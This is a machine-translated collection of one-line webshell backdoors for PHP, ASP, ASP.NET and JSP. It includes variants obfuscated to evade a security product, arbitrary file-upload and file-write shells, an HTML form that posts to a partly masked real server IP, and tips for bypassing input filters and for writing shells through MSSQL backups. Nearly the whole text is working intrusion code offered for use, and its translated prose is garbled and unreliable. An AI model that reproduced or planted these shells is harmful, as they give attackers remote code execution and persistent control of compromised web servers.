Recently a word back door constantly upgrade everyone attention precaution, basically eventful character replacement
The Guardian God. Php a sentence author: Xiao Dong
Copy Code code as follows:
<?php $a = str_replace (x, "", "axsxxsxexrxxt");
$a ($_post["C"]);?>
Test success, mainly against the Guardian God, others can also try
dedecms5.7 A word at the back door
@eval (file_get_contents (' php://input '));
ASP a word Trojan
Program code
<%eval request ("SB")%>
Program code
<%execute request ("SB")%>
Program code
<%execute (Request ("SB"))%>
Program code
<%execute request ("SB")%><% ' <% loop <%:%>
Program code
<% ' <% loop <%:%><%execute request ("SB")%>
Program code
<%execute request ("SB") ' <% loop <%:%>[code]
[Code]<script language=vbs Runat=server>eval (Request ("SB")) </script>
Program code
%><%eval (CHR)%><%
Program code
<%eval request ("SB")%>
Program code
<%executeglobal request ("SB")%>
Program code
If Request ("SB") <> "then Executeglobal Request (" SB ") End If
Fault Tolerant Code
Program code
<% @LANGUAGE = "JAVASCRIPT" codepage= "65001"%>
<%
var lcx = {' name ': Request.Form (' # '), ' sex ': eval, ' age ': ' 18 ', ' nickname ': ' Please call me boss '};
Lcx. Sex ((LCX. Name) + ');
%>
Use ice Fox a word client link
Program code
<%
Set o = Server.CreateObject ("ScriptControl")
O.language = "VBScript"
O.addcode (Request ("subcode")) ' parameter subcode as procedure Code
O.run "E", server,response,request,application,session,error ' parameter name e called, while pressing 6 base objects as arguments
%>
Call Example:
Program code
Http://localhost/tmp.asp? subcode=sub%20e%28server,response,request,application,session,error%29%20eval%28request%28%22v%22%29%29%20end% 20sub&v=response.write%28server.mappath%28%22tmp.asp%22%29%29
PHP Word
Program code
<?php eval ($_POST[SB])?>
Program code
<?php @eval ($_POST[SB])?>
Fault Tolerant Code
Program code
<?php assert ($_POST[SB]);? >
Execute the related PHP statements using the Lanker one sentence client's expert mode
Program code
<?$_post[' sa '] ($_post[' SB ']);? >
Program code
<?$_post[' sa '] ($_post[' SB '],$_post[' SC ')?>
Program code
<?php
@preg_replace ("/[email]/e", $_post[' h '], "error");
?>
After using this, use a chopper a sentence the client enters in the "Configuration" column when configuring the connection
Program code
<o>h= @eval ($_post[c]);</o>
Program code
<script language= "PHP" > @eval ($_POST[SB]) </script>
A word that bypasses the limits
JSP Word
Program code
<%
if (Request.getparameter ("F")!=null) (New Java.io.FileOutputStream (Application.getrealpath ("\") + Request.getparameter ("F")). Write (Request.getparameter ("T"). GetBytes ());
%>
Submitting clients
Program code
<form action= "http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method= "POST" >
<textarea name=t cols=120 rows=10 width=45>your code</textarea><br><center><br>
<input type=submit value= "Submit" >
</form>
aspx sentence
Program code
<%@ Page language= "Jscript"%><%eval (request.item["Pass", "unsafe");%>
Program code
<%@ Page language= "Jscript" validaterequest= "false"%><%response.write (eval (request.item["W"], "unsafe")); %>
asp.net word of JScript
Program code
<%if (request.files.count!=0) {request.files[0]. SaveAs (Server.MapPath (request["F"])); }%>
C # 's asp.net sentence
Program code
<% If Request.Files.Count <> 0 Then request.files (0). SaveAs (Server.MapPath ("F"))%>
vb asp.net a word
First: 114la Web site navigation system background Getwebshell, the latest version, has prohibited the direct input <?php such code
So you can try <script language= "PHP" >...<script> to bypass
Second, the use of the kitchen knife additional data features can be many conversions. So read the Readme.txt of the chopper, the code from LCX's blog.
Third, the use of MSSQL backup a sentence, especially ASP.net and JSP, because the code is too long, so you need to code before and after the extra space and other garbage characters to ensure code integrity, this with backup bat to start a principle.
